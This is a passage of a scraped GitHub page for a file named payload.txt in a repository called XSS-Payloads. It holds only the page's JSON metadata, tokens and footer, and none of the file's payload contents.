configuration_notice","configurationNoticeDismissed":null},"displayName":"payload.txt","displayUrl":"","headerInfo":{"blobSize":"27.3 KB","deleteTooltip":"You must be signed in to make or propose changes","editTooltip":"You must be signed in to make or propose changes","ghDesktopPath":"","isGitLfs":false,"onBranch":true,"shortPath":"45b43b9","siteNavLoginPath":"/login?return_to=https%3A%2F%%2Fpgaijin66%2FXSS-Payloads%2Fblob%2Fmaster%2Fpayload%2Fpayload.txt","isCSV":false,"isRichtext":false,"toc":null,"lineInfo":{"truncatedLoc":"525","truncatedSloc":"433"},"mode":"file"},"image":false,"isCodeownersFile":null,"isPlain":false,"isValidLegacyIssueTemplate":false,"issueTemplate":null,"discussionTemplate":null,"language":"Text","languageID":372,"large":false,"planSupportInfo":{"repoIsFork":null,"repoOwnedByCurrentUser":null,"requestFullPath":"/pgaijin66/XSS-Payloads/blob/master/payload/payload.txt","showFreeOrgGatedFeatureMessage":null,"showPlanSupportBanner":null,"upgradeDataAttributes":null,"upgradePath":null},"publishBannersInfo":{"dismissActionNoticePath":"/settings/dismiss-notice/publish_action_from_dockerfile","releasePath":"/pgaijin66/XSS-Payloads/releases/new?marketplace=true","showPublishActionBanner":false},"rawBlobUrl":"","renderImageOrRaw":false,"richText":null,"renderedFileInfo":null,"shortPath":null,"symbolsEnabled":true,"tabSize":8,"topBannersInfo":{"overridingGlobalFundingFile":false,"globalPreferredFundingPath":null,"showInvalidCitationWarning":false,"citationHelpUrl":"","actionsOnboardingTip":null},"truncated":false,"viewable":true,"workflowRedirectUrl":null,"symbols":{"timed_out":false,"not_analyzed":true,"symbols":[]}},"copilotInfo":null,"copilotAccessAllowed":false,"csrf_tokens":{"/pgaijin66/XSS-Payloads/branches":{"post":"lZOtwMTiCdZ2EnXptUgOqPqXHqk5uJmw3u1ZjW7DoKtEpI5-cFBlpOE4_vndhFI_puddPMSSadefl3NcqhVhhA"},"/repos/preferences":{"post":"sS6iOvoRTKyoTNrQVAz7WUFLz-AXcY4UXm_jIwX_Dh2K6RpDv88awOxGAGXfFhYdo3rIoFCIlgYwrmbXl5AiTA"}}},"title":"XSS-Payloads/payload/payload.txt at master · pgaijin66/XSS-Payloads","appPayload":{"helpUrl":"","findFileWorkerPath":"/assets-cdn/worker/find-file-worker-1583894afd38.js","findInFileWorkerPath":"/assets-cdn/worker/find-in-file-worker-3a63a487027b.js","githubDevUrl":null,"enabled_features":{"code_nav_ui_events":false,"overview_shared_code_dropdown_button":false,"react_blob_overlay":false,"copilot_conversational_ux_embedding_update":false,"copilot_smell_icebreaker_ux":true,"copilot_workspace":false}}}

Footer

© 2024 GitHub, Inc.

Footer navigation

Terms

Privacy

Security

Status

Docs

Contact

Manage cookies

Do not share my personal information

You can’t perform that action at this time.

................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download